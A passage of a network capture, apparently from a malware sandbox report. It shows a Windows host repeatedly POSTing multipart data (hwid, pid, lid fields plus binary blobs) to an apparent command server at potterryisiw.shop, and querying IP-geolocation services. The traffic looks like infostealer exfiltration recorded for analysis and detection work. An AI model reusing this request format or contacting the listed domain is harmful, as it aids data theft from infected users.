2024-07-01 07:16:35 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18169 Host: potterryisiw.shop
2024-07-01 07:16:35 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:35 UTC	2838	OUT	Data Raw: 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa Data Ascii: A~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'
2024-07-01 07:16:36 UTC	804	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sqi6ngtt3q8ur4dch2f03ftltu; expires=Fri, 25-Oct-2024 01:03:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZAcHJ4d7CLxxrk%2FG23YTU024KNvED5xdVNC7LYUb0DOAPSJ7U2TXyFeyhpNAosY82PmjeoumCQjw%2Fw5Tq9Zg59t4DjPuTwsIeLWBJ9ldxvng8CIiI0Blx9mwa%2BBrRAyQCQXbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c8adb3743aa-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:36 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49810	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:36 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-07-01 07:16:36 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 01 Jul 2024 07:16:36 GMT content-type: application/json; charset=utf-8 Content-Length: 1025 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-01 07:16:36 UTC	876	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
2024-07-01 07:16:36 UTC	149	IN	Data Raw: 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 61 75 70 2e 6c 75 6d 65 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 65 6e 74 75 72 79 6c 69 6e 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: email": "abuse@aup.lumen.com", "name": "Centurylink Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49811	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:36 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18169 Host: potterryisiw.shop
2024-07-01 07:16:36 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:36 UTC	2838	OUT	Data Raw: 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa Data Ascii: A~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'
2024-07-01 07:16:37 UTC	806	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o843fihdgie7ia2kgkvu9u89rn; expires=Fri, 25-Oct-2024 01:03:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vft8553XaiIdWd2XqQpPQWlgjE0FHpTK%2BWRxMKC1pNPa3ppHY1aUkpc%2Fe5vKD%2Bby2jiVCLvE4DIyZD%2By3YHMO3lgKyyilRX9Vr91fYEKn9YtPiNC8ddMh7MQoNyl9tN7tIQy5w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c90cd7143bb-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:37 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49813	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:36 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8790 Host: potterryisiw.shop
2024-07-01 07:16:36 UTC	8790	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:37 UTC	804	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=05ckk8balnfbl0e3cbppsgmt0k; expires=Fri, 25-Oct-2024 01:03:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6JuiPFibKotEI77y55Qd0YvvxeLQpJK6AICBIW3ecHZdqgbuMBs6%2FEuMzRyz4DAiGpNIZFXRkGLy5nZzriwBZvJf%2F6XpseYBl1QjIGWm3dFCusjkV5lysyY3x0eXFIWYK4%2Fh5g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c92ddb47d05-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:37 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49814	104.26.4.15	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:37 UTC	260	OUT	GET /demo/home.php?s=8.46.123.33 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-07-01 07:16:37 UTC	663	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:37 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC466E50:7346_93878F2E:0050_668257D5_16A1435E:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=owNNv%2FrWfPQZrxL0GMiurS9Yvbb2ZwR8aV8%2Fu1GmKcgFtzKjVFZU2TyL9HA8qLoKby093rQWR0Wb%2FMoXpurWDK%2FTjM%2BQno%2Bp%2BKwVbRH44qoSLWggHlKxpHIcsw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c942c041825-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:37 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-07-01 07:16:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49816	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:37 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8790 Host: potterryisiw.shop
2024-07-01 07:16:37 UTC	8790	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:37 UTC	806	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fgp3sir8urnnoi4074d15cahdr; expires=Fri, 25-Oct-2024 01:03:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bDtahDjOaY79fmLNnpM1urp5sX901vSYvpDCQx1igrca2tF3wUxk%2BpEvumXxAujqyEtmlF3uLXrI%2B3N1TtGhH5OPHFyUCt7M%2Buy6ZugcPd2ZYEQAYd10w3uXTNdDrB1ugF%2Bjsg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c96ff2143ed-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:37 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49817	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:37 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20443 Host: potterryisiw.shop
2024-07-01 07:16:37 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:37 UTC	5112	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 Data Ascii: `M?lrQMn 64F6(X&7~
2024-07-01 07:16:38 UTC	808	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n7opeathmvt8f0atb7fc3e4s8k; expires=Fri, 25-Oct-2024 01:03:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4yC1%2Bd89UWzmHqJUlTC8y%2BKtOAzwdyJh5pSEjJ1MB%2BZYgqrwyqnhjbScRwKr2SF8TTrrsjA6Q4dQp%2F91VELsZ%2FDuk1nrzIr7dzDJ07J1hWEEyEeioGJkC5q0sRmwqkFURnuj3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c990e1ec328-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:38 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49818	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:38 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20443 Host: potterryisiw.shop
2024-07-01 07:16:38 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:38 UTC	5112	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 Data Ascii: `M?lrQMn 64F6(X&7~
